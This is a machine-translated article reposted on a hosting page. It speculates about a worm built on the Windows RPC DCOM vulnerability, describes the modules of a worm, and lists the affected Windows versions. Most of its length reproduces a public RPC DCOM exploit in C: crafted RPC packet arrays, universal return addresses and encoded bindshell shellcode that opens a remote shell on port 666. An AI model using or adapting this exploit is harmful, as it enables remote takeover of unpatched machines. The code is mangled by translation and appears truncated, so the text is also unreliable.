A study on the assumption of RPC DCOM worm

Source: Internet
Author: User
Tags 0xc0
Recently, as almost every big loophole has been announced, there will be a worm (worm) epidemic against this vulnerability, and the recent nasty RPC DCOM vulnerability estimate is about to become a new vector for worm transmission. As if writing worm is a hot, many people also feel curious, think worm is a very deep technology, in fact, this is a very simple programming game. I've always had an idea to write a technical analysis of worm (---in order not to teach bad kids:, just have been lazy to write, I have lost interest in the preparation of worms, now in the new worm storm is coming, I am here a simple analysis of the worm related technology, and RPC DCOM Worm to make some assumptions. Everyone when I am to help "Zhou" for abuse, or deliberately show off, I think still want to write this article, more than a year has not written articles, but also had a wish of their own. You can now choose not to look down, but don't spit on me after you finish. :)


What is called a worm

First from Spark's "Internet worm definition and history" article excerpt Huanhuan 趙 orm Explanation: Worms This biological term in 1982 by Xerox PARC John F. Shoch and other people to introduce the computer field [30], and gives the two most basic features of the computer worm: "You can move from one computer to another" and "Copy yourself." Their purpose in compiling the worms is to do a model test of distributed computing, in which the destructive and difficult control of the worm has begun to reveal itself. After the outbreak of the Morris Worm in 1988, Eugene H. Spafford, in order to distinguish between worms and viruses, gave a technical definition of the worm, "the computer worm can run independently and can propagate a version of itself that contains all the features to another computer." "(Worm is-a program, can run by itself and can propagate a fully working version of itself to other machines. )。

Since this is not to introduce the definition and history of worms is not much to say, if you are interested in these, you can read Spark's article here http://www.nsfocus.net/index.php?act=magazine&;; do=view&mid=1851

Part of the two worms

The composition of a worm is actually very simple, because I am not here to teach you to write worms, but also due to time constraints, I here simply say some.
We can think of it as a project, and we divide the project into 4 modules:

1. Attack module
First you need to have a large number of systems affected by a serious vulnerability can be easily exploited to be able to remotely control the machine. such as guessing weak password, remote overflow ah, and so on.

2. Infection Module
Consider how to get the other person attacked, perform the function you want to achieve, and complete an infection with a host. For the remote overflow is also perfect shellcode. This should be considered in the middle of an infection spread (propagation) pathway.

3. Communication module
For example, scan a network segment has related weaknesses of the machine, save as a file, and then attack the IP, or randomly generate IP and then attack the IP.
The simple thing is to scan a weak machine.

4. Function module
Functional module is actually a can not be a module, but if you want the other infected worm after the other side plus back door/ddos and other functions, you must have this.

In fact, the key to a worm's success is an attack module and an infection module. :)


The propagation (propagation) of three common worms


The specific is not in-depth, only a simple list:

1. Email

2. FTP

3. http

4. NetBIOS

5. TFTP

6. rcp

7. Other


Introduction to four RPC DCOM vulnerabilities

The RPC DCOM vulnerability is a serious vulnerability in a recent Windows system and the most widely affected Windows vulnerability in history.

Remote Procedure Call (RPC) is a protocol that is applied to the Windows operating system. RPC provides a mutual processing communication mechanism that allows the computer running the program to execute code on a remote system. The RPC protocol itself originated from the OSF (Open Software Foundation) RPC protocol, and later added some additional Microsoft private extension features. module handling TCP/IP information exchange in RPC because of malformed handling of malformed information, remote attackers can use this flaw to execute arbitrary instructions on the system with local System privileges. This flaw affects the use of RPC's DCOM interface, which justifies the DCOM object activation request (such as a UNC path) that the client machine sends to the server. An attacker who successfully exploited this flaw could execute arbitrary instructions with local System privileges. An attacker can perform arbitrary actions on the system, such as installing a program, viewing or changing, deleting data, or establishing an account with system administrator privileges.
This vulnerability affects the following versions of Windows:
Microsoft Windows XP SP1a
Microsoft Windows XP SP1
Microsoft Windows XP
Microsoft Windows NT 4.0sp6a
Microsoft Windows NT 4.0SP6
Microsoft Windows NT 4.0SP5
Microsoft Windows NT 4.0SP4
Microsoft Windows NT 4.0SP3
Microsoft Windows NT 4.0sp2
Microsoft Windows NT 4.0sp1
Microsoft Windows NT 4.0
Microsoft Windows 2003
Microsoft Windows 2000SP4
Microsoft Windows 2000SP3
Microsoft Windows 2000SP2
Microsoft Windows 2000SP1
Microsoft Windows 2000

As you can see, this vulnerability affects all other Windows systems except WinME the following version of the Windows system. At the same time, this vulnerability could be exploited remotely by attackers,
Arbitrary code can be executed remotely on a machine that does not fix the vulnerability, causing the attacker to have complete control over the vulnerable machine.


The assumption of the five RPC DCOM worms

1. The vulnerability is more likely to be exploited as a worm capable of infecting win2000/winxp machines that have RPC DCOM vulnerabilities because RPC COM already has a common attack code that attacks Win2000/winxp.

such as the Packetstorm on the Win2000 and WinXP General exploit:


/* Windows 2003 <= remote RPC DCOM exploit
* Coded by.: [Oc192.us]:. Security
*
* Features:
*
*-D destination host to attack.
*
*-P for port selection as exploit in ports other than 135 (139,445,539 etc)
*
*-R for the using a custom return address.
*
*-T to select target type (Offset), this includes universal offsets for-
* Win2K and WinXP (Regardless of Service pack)
*
*-L to select Bindshell port on remote machine (default:666)
*
*-Shellcode has been modified to call ExitThread, rather than, exitprocess
* Preventing crash of RPC service on remote machine.
*
* This is provided as proof-of-concept code only for educational
* Purposes and testing by authorized individuals with permission to
* Doing so.
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

* Xfocus Start * *
unsigned char bindstr[]={
0x05,0x00,0x0b,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7f,0x00,0x00,0x00,
0xd0,0x16,0xd0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,
0X2B,0X10,0X48,0X60,0X02,0X00,0X00,0X00};

unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xe8,0x03
, 0x00,0x00,0xe5,0x00,0x00,0x00,0xd0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
, 0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xfd,0xcc,0x45
, 0x64,0x49,0xb0,0x70,0xdd,0xae,0x74,0x2c,0x96,0xd2,0x60,0x5e,0x0d,0x00,0x01,0x00
, 0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5e,0x0d,0x00,0x02,0x00,0x00,0x00,0x7c,0x5e
, 0x0d,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xf1,0xf1,0x2a,0x4d
, 0xce,0x11,0xa6,0x6a,0x00,0x20,0xaf,0x6e,0x72,0xf4,0x0c,0x00,0x00,0x00,0x4d,0x41
, 0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0d,0xf0,0xad,0xba,0x00,0x00
, 0x00,0x00,0xa8,0xf4,0x0b,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4d,0x45
, 0x4f,0x57,0x04,0x00,0x00,0x00,0xa2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00
, 0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00
, 0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
, 0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xc8,0x00
, 0x00,0x00,0x4d,0x45,0x4f,0x57,0x28,0x03,0x00,0x00,0xd8,0x00,0x00,0x00,0x00,0x00
, 0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xc4,0x28,0xcd,0x00,0x64,0x29
, 0xcd,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xb9,0x01,0x00,0x00,0x00,0x00
, 0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xab,0x01,0x00,0x00,0x00,0x00
, 0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xa5,0x01,0x00,0x00,0x00,0x00
, 0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xa6,0x01,0x00,0x00,0x00,0x00
, 0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xa4,0x01,0x00,0x00,0x00,0x00
, 0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xad,0x01,0x00,0x00,0x00,0x00
, 0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xaa,0x01,0x00,0x00,0x00,0x00
, 0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
, 0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
, 0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
, 0x08,0x00,0xcc,0xcc,0xcc,0xcc,0x50,0x00,0x00,0x00,0x4f,0xb6,0x88,0x20,0xff,0xff
, 0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
, 0x08,0x00,0xcc,0xcc,0xcc,0xcc,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
, 0x02,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
, 0x00,0x00,0x78,0x19,0x0c,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
, 0x00,0x00,0x70,0xd8,0x98,0x93,0x98,0x4f,0xd2,0x11,0xa9,0x3d,0xbe,0x57,0xb2,0x00
, 0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0x80,0x00
, 0x00,0x00,0x0d,0xf0,0xad,0xba,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
, 0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
, 0x00,0x00,0x60,0x00,0x00,0x00,0x4d,0x45,0x4f,0x57,0x04,0x00,0x00,0x00,0xc0,0x01
, 0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3b,0x03
, 0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
, 0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xc5,0x17,0x03,0x80,0x0e
, 0xe9,0x4a,0x99,0x99,0xf1,0x8a,0x50,0x6f,0x7a,0x85,0x02,0x00,0x00,0x00,0x00,0x00
, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
, 0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0x30,0x00
, 0x00,0x00,0x78,0x00,0x6e,0x00,0x00,0x00,0x00,0x00,0xd8,0xda,0x0d,0x00,0x00,0x00
, 0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2f,0x0c,0x00,0x00,0x00,0x00,0x00,0x00,0x00
, 0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
, 0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0x10,0x00
, 0x00,0x00,0x30,0x00,0x2e,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
, 0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0x68,0x00
, 0x00,0x00,0x0e,0x00,0xff,0xff,0x68,0x8b,0x0b,0x00,0x02,0x00,0x00,0x00,0x00,0x00
, 0x00,0x00,0x00,0x00,0x00,0x00};

unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
, 0x00,0x00,0x5c,0x00,0x5c,0x00};

unsigned char request3[]={
0x5c,0x00
, 0x43,0x00,0x24,0x00,0x5c,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
, 0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
, 0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
, 0x2e,0x00,0x64,0x00,0x6f,0x00,0x63,0x00,0x00,0x00};
/* End Xfocus * *

int type=0;
struct
{
Char *os;
U_long ret;
}
Targets[] =
{
{"[Win2k-universal]", 0x0018759f},
{"[Winxp-universal]", 0x0100139d},
}, V;


void usage (char *prog)
{
int i;
printf ("RPC DCOM exploit coded by.: [Oc192.us]:. Security\n ");
printf ("usage:\n\n");
printf ("%s-d [options]\n", prog);
printf ("options:\n");
printf ("-d:hostname to attack [required]\n");
printf ("-t:type [default:0]\n");
printf ("-r:return address [default:selected from target]\n");
printf ("-p:attack port [default:135]\n");
printf ("-l:bindshell port [default:666]\n\n");
printf ("types:\n");
for (i = 0; i < sizeof (targets)/sizeof (v); i++)
printf ("%d [0x%.8x]:%s\n", I, Targets[i].ret, Targets[i].os);
Exit (0);
}

unsigned char sc[]=
"\x46\x00\x58\x00\x4e\x00\x42\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x4e\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x46\x00\x58\x00"

"\xff\xff\xff\xff"/* Return address * *

"\xcc\xe0\xfd\x7f"/* Primary thread data Block * *
"\xcc\xe0\xfd\x7f"/* Primary thread data Block * *

/* Bindshell no RPC crash, defineable Spawn Port * *
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
"\XB3\X5A\XF8\XEC\XBF\X32\XFC\XB3\X8D\X1C\XF0\XE8\XC8\X41\XA6\XDF"
"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
"\XBE\X32\X94\X09\XF9\X22\X6B\XB6\XD7\XDD\X5A\X60\XDF\XDA\X8A\X81"
"\XBF\X32\X1D\XC6\XAB\XCD\XE2\X84\XD7\XF9\X79\X7C\X84\XDA\X9A\X81"
"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
"\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
"\XBF\X32\X1D\XC6\X93\X01\X6B\X01\X53\XA2\X95\X80\XBF\X66\XFC\X81"
"\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
"\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
"\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
"\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
"\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
"\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
"\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
"\XC9\X02\XC5\X7F\XE9\X22\X1F\X4C\XD5\XCD\X6B\XB1\X40\X64\X98\X0B"
"\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
"\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
"\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
"\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
"\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
"\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
"\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
"\XF4\XB9\XCE\X9C\XBC\XEF\X1F\X84\X34\X31\X51\X6B\XBD\X01\X54\X0B"
"\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.